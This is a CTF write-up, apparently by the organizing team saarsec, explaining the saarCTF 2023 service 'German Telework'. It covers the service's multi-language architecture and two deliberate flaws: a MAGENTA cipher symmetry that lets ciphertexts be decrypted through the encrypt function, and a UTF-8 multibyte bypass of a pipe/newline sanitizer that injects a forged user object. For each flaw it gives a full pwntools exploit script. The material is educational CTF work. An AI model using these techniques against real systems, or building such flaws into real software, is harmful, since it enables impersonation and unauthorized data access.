Saarsec

saarsec

Schwenk and pwn

saarCTF 2023 - German Telework

saarCTF 2023 - German Telework

German Telework is a full-stack remote work framework. It can do anything: public announcements on a board, private messages to colleagues, task management and holiday planning. All in one service!

German Telework Architecture

The user interacts with the system through TLS-encrypted TCP connections. The sophisticated productivity suite consists of multiple sub-services that communicate with each other via TCP sockets. A Gateway handles the interaction of the user with the other sub-services. The four functionalities listed above are provided by the four “backend” sub-services: Tasks, Holiday, Board, and MessageCrypt. The Router acts as an intermediary between the Gateway and the backend services.

Gateway

The Gateway is written in Python and provides the user interface. It sends a text-based menu to the user, receives user responses requests and serializes them into an internal message format. Gateway messages are structured as follows:

<Numerical ID of the destination sub-service>|||<user object>|||<service-specific data>

Each message contains a user object. This object is structured as follows:

identifier | first name | last name | password | employee_id | job description | holidays left

The identifier identifies this string as a user object and is always 0. The employee ID is a unique identifier (UUID) for the user. Holidays left is an integer that starts from 30 and is modified when taking holiday. Furthermore, when performing some actions, services modify the user and append the last performed action with ||. For example, creating a task will result in a user that has, in addition to the format above, || <task> appended, where task is the created task. This is used to confirm that the request worked. To make sure that the user cannot exploit this service, all user input is sanitized, that is | and \n characters are stripped from user input.

The Gateway dispatches those messages to the Router though a TCP socket. As all other inter-service communications, those messages are obfuscated by XOR-ing them with a fixed keystream (this is referred to as transport encrytion throughout the code). Once the Router provides a reply, the Gateway deserializes it and displays it to the user.

Router

The Router, also written in Python, receives messages from the Gateway, strips away the numerical ID of the destination sub-service and forwards the message to its destination. Once the destination sub-service processed the message and replied, the Router forwards the reply back to the Gateway.

Board

The Board sub-service is written in Object Pascal. Users can provide messages that are then stored, together with their name, as an “announcement”. All announcements are broadcasts: they can be received by any user of the system. The Board merely serves as a flagstore for the MessageCrypt sub-service.

MessageCrypt

MessageCrypt is written in C++. This sub-service allows the user to encrypt a message to any user in the system or to decrypt a message they received. The encryption is performed using a symmetric block cipher.

To provide a convenient user experience, MessageCrypt also manages the cryptographic keys for the users. A keystore stores a symmetric key for each user. A message is always encrypted with the recipient’s key, which is randomly generated on first use. The recipient is identified by their employee ID, which is public information and can be retrieved through the “employee register” (a Gateway functionality). When the user requests to decrypt a message, the key is selected based on the employee ID specified in the user object in the protocol message. In other words, users can only decrypt messages that were encrypted for them with their symmetric key.

The symmetric block cipher used in this sub-service is the long-forgotten MAGENTA, a candidate in the AES standardization process in the late 1990s.

The first vulnerability

Besides using the same key for both encryption and decryption, MAGENTA has another interesting symmetry. The paper “Cryptanalysis of Magenta” by Eli Biham et al. points out:

[D]ue to the symmetry of the key scheduling, encryption and decryption are identical except for the order of the two halves of the plaintexts and ciphertexts. Therefore, given a ciphertext, one can decrypt it by swapping its two halves, reencrypting the result, and swapping again.

This symmetry is also apparent from the MAGENTA implementation in magenta.cc: The encryption and decryption functions are very similar. In fact, the decryption could also be implemented as follows:

MAGENTA_state_t MAGENTA::decrypt(MAGENTA_state_t const& x, MAGENTA_key_t const& key) {
    MAGENTA_state_t state = swap_halves(x);
    state = encrypt(state, key);
    return swap_halves(state);
}

The vulnerability in the MessageCrypt sub-service is built around this property. The gameserver stores encrypted flags as announcements in the Board service. These announcements are posted by random users (created by the gameserver) and look like this:

Note to self: <base64-encoded ciphertext containing a flag>

As the text “Note to self” indicates, the author of the announcement encrypted the message to themselves by providing their own employee ID as recipient during the encryption process.

To decrypt the flag, the attacker performs the following steps:

In code, this looks like this:

import re
import base64
import time
import random
from pwn import *
from typing import Optional

TARGET = "127.0.0.1" # change me!

# wrapper functions for sending/receiving
def send_to_service(conn, data):
    conn.sendline(data)
def recv_until_from_service(conn, until):
    return conn.recvuntil(until)
def recv_line_from_service(conn):
    return conn.recvline()

# register a new user and login
def register_and_login(conn):
    # the initial welcome screen
    recv_until_from_service(conn, "Goodbye\n")
    send_to_service(conn, "Register")
    recv_until_from_service(conn, "First name?\n")
    first_name = str(time.time_ns())
    last_name = str(time.time_ns())
    password = str(time.time_ns())
    send_to_service(conn, first_name)
    recv_until_from_service(conn, "Last name?\n")
    send_to_service(conn, last_name)
    recv_until_from_service(conn, "Password?\n")
    send_to_service(conn, password)
    recv_until_from_service(conn, "Successfully created user!\n")
    return (first_name, last_name, password)

# receive the main menu
def receive_main_menu(conn):
    recv_until_from_service(conn,
        b'What do you want to do?\n'
        b'Check my tasks\n'
        b'Check my holidays\n'
        b'Encrypt or decrypt a message\n'
        b'Read or post important announcements\n'
        b'View the employee register\n'
    )

def board_enter_menu(conn):
    send_to_service(conn, b'Read or post important announcements')
    recv_until_from_service(conn,
        b'Get number of active announcements\n'
        b'Get announcement by ID\n'
        b'Get announcement by number\n'
        b'Post an announcement\n'
    )

def board_get_count(conn) -> int:
    send_to_service(conn, b"Get number of active announcements")
    response = recv_line_from_service(conn).decode()
    rx = re.match(r"^Number of announcements: (?P<count>\d+)$", response)
    if rx:
        return int(rx.group("count"))
    raise gamelib.MumbleException("Board did not return number of messages.")

def extract_from_announcement(announcement: str) -> dict[str, str]:
    rx = re.match(
        r"^ANNOUNCEMENT\. ATTENTION PLEASE, THIS IS "
        r"(?P<first>[^ \-]+?[ \-][^ ]+ [^ ]+) (?P<last>[^ ]*?) "
        r"SPEAKING TO EVERYONE\. (?P<message1>.*?) I REPEAT\. "
        r"(?P<message2>.*?) END OF ANNOUNCEMENT\.",
        announcement
    )
    return {
        "first": rx.group("first"),
        "last": rx.group("last"),
        "message": rx.group("message1")
    }

def board_get_message_by_number(conn, message_number: int) -> dict[str, str]:
    send_to_service(conn, b"Get announcement by number")
    recv_until_from_service(conn, b"Message Number?\n")
    send_to_service(conn, str(message_number).encode())
    response = recv_line_from_service(conn)
    return extract_from_announcement(response.decode())

def get_employee_id(conn, first: str, last: str) -> Optional[str]:
    send_to_service(conn, b"View the employee register")
    employee_list = recv_until_from_service(conn, b"End of employee list.\n").decode()
    for line in employee_list.splitlines():
        rx = re.match(r"^(?P<eid>[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}) \| .* \| (?P<first>.*) \| (?P<last>.*)$", line)
        if rx is not None and rx.group("first") == first and rx.group("last") == last:
            return rx.group("eid")
    return None

def mc_enter_menu(conn):
    send_to_service(conn, b'Encrypt or decrypt a message')
    recv_until_from_service(conn,
        b'Encrypt a message to someone else\n'
        b'Decrypt a message I received\n'
    )

def mc_encrypt_message(conn, eid: str, message_b64s: str) -> str:
    send_to_service(conn, b"Encrypt a message to someone else")
    recv_until_from_service(conn, b"Recipient's employee ID?\n")
    send_to_service(conn, eid.encode())
    recv_until_from_service(conn, b"Message Body? (up to 512 bytes, base64)\n")
    send_to_service(conn, message_b64s.encode())
    recv_until_from_service(conn, b"This is your encrypted message:\n")
    return recv_line_from_service(conn).decode()

def swap_halves_b64(buf_b64: str) -> str:
    buf = bytearray(base64.b64decode(buf_b64))
    assert (len(buf) % 16 == 0)
    for start in range(0, len(buf), 16):
        tmp = buf[start:start + 8]
        buf[start:start + 8] = buf[start + 8:start + 16]
        buf[start + 8:start + 16] = tmp
    return base64.b64encode(buf)

###########################################################################

if __name__ == '__main__':
    conn = remote(TARGET, 30000, timeout=10, ssl=True)
    try:
        # register & login
        first, last, pw = register_and_login(conn)
        receive_main_menu(conn)

        # retrieve number of announcements and find those containing flags
        board_enter_menu(conn)
        count = board_get_count(conn)
        receive_main_menu(conn)

        # iterate over the announcements and search for flags
        for message_number in range(0, count):
            # retrieve the announcement
            board_enter_menu(conn)
            resp: dict[str, str] = board_get_message_by_number(conn, message_number)
            receive_main_menu(conn)

            # extract the ciphertext
            rx1 = re.match(r"^Note to self: (?P<ciphertext>.*)$", resp["message"])
            if rx1:
                encrypted_flag_b64s = rx1.group("ciphertext")

                # find the author's employee id
                eid = get_employee_id(conn, resp["first"], resp["last"])
                receive_main_menu(conn)

                # use the "encrypt" function of messagecrypt to decrypt the message
                mc_enter_menu(conn)
                # - swap halves
                message_b64: str = swap_halves_b64(encrypted_flag_b64s).decode()
                # - encrypt to author
                result_b64: str = mc_encrypt_message(conn, eid, message_b64)
                # - swap halves again
                result_b64 = swap_halves_b64(result_b64)
                # - extract the flag from the plaintext
                plaintext = base64.b64decode(result_b64).decode("utf-8", "ignore")
                rx2 = re.match(r".*(?P<flag>SAAR{[A-Za-z0-9-_]+}).*", plaintext)
                if rx2:
                    print(rx2.group("flag"))
                receive_main_menu(conn)
    finally:
        conn.close()

Tasks

The tasks backend is written in Java. It allows a user to create a task, delete a task and list all task names and the matching descriptions for a user. The task backend consumes serialized task objects of the form 1 | <task_action_id> | task name | task description | steps to reproduce | epic | sprint | hours estimated. Only hours estimated was not a string, it was parsed as an Integer. The tasks backend serves as the other of the two flagstores of the service.

Holiday

The holiday sub-service is written in C#. You can take some time off, cancel your holiday and get all leave requests. The leave backend consumes serialized leave objects of the form 2 | <leave action id> | start date | end date | reason for holiday | holiday destination | emergency phone number. Here, both date fields required C# datetime-compliant values, otherwise only strings.

The second vulnerability

The second vulnerability abuses buggy parsing in the holiday backend coupled with loose parsing in the holiday backend and the gatewy. The first problem is in UserLeaveList.cs, line 23-25. This loop iterates the StreamReader byte by byte and converts the result to char. The communication from user to gateway and among the services supports utf-8, however. utf-8 has multibyte characters. If we manage to find a character that contains 0x7c (|) and 0x0a (\n), we can work around the sanitize function from the gateway. The second problem is the loose parsing of serialized leave requests (deserialize in Leave.cs). Even though the leave request always starts with 2, the deserialize option parses this id from the serialized object. This allows us to potentially craft a payload with an arbitrary id. The third problem is the loose parsing of the user in the gateway (deserialize in user.py. The replies from the services can contain data appended to the user with ||. To account for that, the user deserialization first splits the string at || and then iterates the resulting list. If the first byte is 0, this part is considered a user object. In normal operation, this will only ever be one user. However, if we can craft a serialized user object with the help of the multibyte problem above, we will insert a second serialized user object, and the user deserialize will take the last one, that is our inserted user! Putting this into code, the final exploit looks like this:

flag_ids = # the flag ids for this service
target = # the ip to attack


import time
import random
import re
from typing import Optional
from pwn import *

# wrapper function for sending
def send_to_service(conn, data):
    conn.sendline(data)

# wrapper function for receiving
def recv_until_from_service(conn, until):
    try:
        data = conn.recvuntil(until)
    except EOFError:
        raise EOFError()
    if data == "":
        raise EOFError()
    return data


# wrapper function for receiving
def recv_line_from_service(conn):
    try:
        data = conn.recvline()
    except EOFError:
        raise EOFError()
    if data == "":
        raise EOFError()
    return data


# register a new user and login
def register_and_login(conn):
    # the initial welcome screen
    recv_until_from_service(conn, "Goodbye\n")
    send_to_service(conn, "Register")
    recv_until_from_service(conn, "First name?\n")
    first_name = str(time.time_ns())
    last_name = str(time.time_ns())
    password = str(time.time_ns())
    send_to_service(conn, first_name)
    recv_until_from_service(conn, "Last name?\n")
    send_to_service(conn, last_name)
    recv_until_from_service(conn, "Password?\n")
    send_to_service(conn, password)
    recv_until_from_service(conn, "Successfully created user!\n")
    return (first_name, last_name, password)


# receive the main menu
def receive_main_menu(conn):
    recv_until_from_service(conn,
        b'What do you want to do?\n'
        b'Check my tasks\n'
        b'Check my holidays\n'
        b'Encrypt or decrypt a message\n'
        b'Read or post important announcements\n'
        b'View the employee register\n'
    )


# holiday menu recv blob
def enter_holiday_menu(conn):
    send_to_service(conn, "Check my holidays")
    recv_until_from_service(conn,
        b'Take time off\n'
        b'Cancel holiday\n'
        b'Check current bookings\n'
    )

# the attacker payload with a second holiday-conform object to inject
def take_time_off_1(conn, flagid):
    send_to_service(conn, "Take time off")
    month = random.randint(1,12)
    rand1 = random.randint(1,10)
    rand2 = random.randint(1,10)
    big = max(rand1,rand2)
    small = min(rand1,rand2)
    start_date = str(small) + "-" + str(month) + "-24"
    end_date = str(big) + "-" + str(month) + "-24"
    # the goal is to create a holiday request that, when later parsed back from file, becomes two holiday requests, but the second one starts with a 0:
    # additionally, the <flagid> is the user that we want to impersonate, the date fields need to adhere to the datetime format (otherwise parsing breaks
    # in the leave deserialization) and the uuid field needs to be valid uuid hex, otherwise the user parsing fails in the gateway.
    # Also, the last entry needs to be a number 0 <= number <= 30, otherwise we might run into issues that our holiday is depleted
    # 2 | 0 | <start> | <end> | a | a | b \n 0 | <flagid> | <valid-date> | <valid-date> | <valid-uuid> | e | 30

    # now the special chars:
    # unicode chars taken from here: https://en.wikipedia.org/wiki/List_of_Unicode_characters
    
    # 0x207c, whitespace and pipe
    # injects a pipe, but with a whitespace (which is not always desired)
    pipe = " ⁼ "
    
    # 0x167c, a nonprintable char (ignored by the parser) and a pipe
    # there are situations where a whitespace in front of a pipe breaks the exploit
    # this gives a clean | without anything else
    pipe_nowhite = "ᙼ"
    
    # 0x300a, becomes 0\n
    # this is the character to inject a newline
    newline = " 《"
    
    # we already start our construct with `2|0|<start>|<end>`, as these fields are either not settable with a holiday request or need to follow a specific form (that is DateTime)
    # so the first field we can write arbitrarily is the reason field. We set it to:
    # ` a | a | b \n 0 | <flagid> | <a valid datetime> | <another valid datetime> | <valid-uuid>`
    # this leaves 2 fields to be completed by the destination and the phone field
    reason = 2*("a" + pipe) + "b" + newline + "0" + pipe_nowhite + flagid + pipe_nowhite + "14-10-24" + pipe + "16-10-24" + pipe_nowhite + "5a89859c53ad48c8a65a82baffa675b5"
    destination = "e"
    phone = "30"
    recv_until_from_service(conn, "Start date?\n")
    send_to_service(conn, "10-10-24")
    recv_until_from_service(conn, "End date?\n")
    send_to_service(conn, "12-10-24")
    recv_until_from_service(conn, "Why do you want to take holiday?\n")
    send_to_service(conn, reason)
    recv_until_from_service(conn, "Where will you go?\n")
    send_to_service(conn, destination)
    recv_until_from_service(conn, "How can we reach you during your holiday? Please enter your phone number:\n")
    send_to_service(conn, phone)
    answer = recv_line_from_service(conn)


def take_time_off_2(conn):
    send_to_service(conn, "Take time off")
    month = random.randint(1,12)
    rand1 = random.randint(1,10)
    rand2 = random.randint(1,10)
    big = max(rand1,rand2)
    small = min(rand1,rand2)
    start_date = str(small) + "-" + str(month) + "-24"
    end_date = str(big) + "-" + str(month) + "-24"
    reason = "d"
    destination = "e"
    phone = "f"
    recv_until_from_service(conn, "Start date?\n")
    send_to_service(conn, "10-11-24")
    recv_until_from_service(conn, "End date?\n")
    send_to_service(conn, "12-11-24")
    recv_until_from_service(conn, "Why do you want to take holiday?\n")
    send_to_service(conn, reason)
    recv_until_from_service(conn, "Where will you go?\n")
    send_to_service(conn, destination)
    recv_until_from_service(conn, "How can we reach you during your holiday? Please enter your phone number:\n")
    send_to_service(conn, phone)
    answer = recv_line_from_service(conn)


def cancel_holiday(conn):
    send_to_service(conn, "Cancel holiday")
    recv_until_from_service(conn, "Start date?\n")
    send_to_service(conn, "14-10-24")
    recv_until_from_service(conn, "End date?\n")
    send_to_service(conn, "16-10-24")
    answer = recv_line_from_service(conn)


# task menu recv blob
def enter_task_menu(conn):
    send_to_service(conn, "Check my tasks")
    recv_until_from_service(conn,
        b'Create task\n'
        b'Complete task\n'
        b'List all tasks\n'
    )

# check details of a task
def check_task_details(conn, task_name):
    send_to_service(conn, "List all tasks")
    # Success
    recv_line_from_service(conn)
    answer = recv_until_from_service(conn, b"\n\n")
    return answer


def main():
    for flagid in flag_ids:
        try:
            conn = remote(target, 30000, timeout=10, ssl=True)
            # register & login
            first, last, pw = register_and_login(conn)
            receive_main_menu(conn)
            # take time off: this crafts the attacker payload
            enter_holiday_menu(conn)
            take_time_off_1(conn, flagid)
            receive_main_menu(conn)
            # at this point, we have not triggered the vulnerable code yet
            # to trigger it, we need to issue another leave command with the same user
            # then, the leave backend will read the existing leave requests from the file
            # 
            # take another time off:
            enter_holiday_menu(conn)
            # this is just an ordinary take time off command, nothing special
            take_time_off_2(conn)
            receive_main_menu(conn)
            # now, we have 3 (!) leave requests in the file of the user:
            # the first benign one
            # the one that is actually our user struct
            # a second benign one

            # now, we cancel the injected holiday, as it returns the canceled holiday as part of the user
            enter_holiday_menu(conn)
            cancel_holiday(conn)
            receive_main_menu(conn)
            # the gateway receives the user that contains as last action the canceled holiday
            # as the canceled holiday has an id of 0, it is mistaken for a user and sets our username to
            # the flag id!
            # the final step is now easy: request all tasks as the flagid user to obtain the flag
            enter_task_menu(conn)
            res = check_task_details(conn, flagid)
            # the flag is now in the response
            print(res)
            exit(0)
        finally:
            conn.close()

Bonus

We had multiple services that contained a remote code execution. As we (intentionally) did not isolate the services much, it was possible to directly talk to the different sub-services as they communicated via localhost. Consequently, you could get the flag of the second flag store without exploiting the matching vulnerability by implementing the xorshift and crafting a valid packet for the task backend.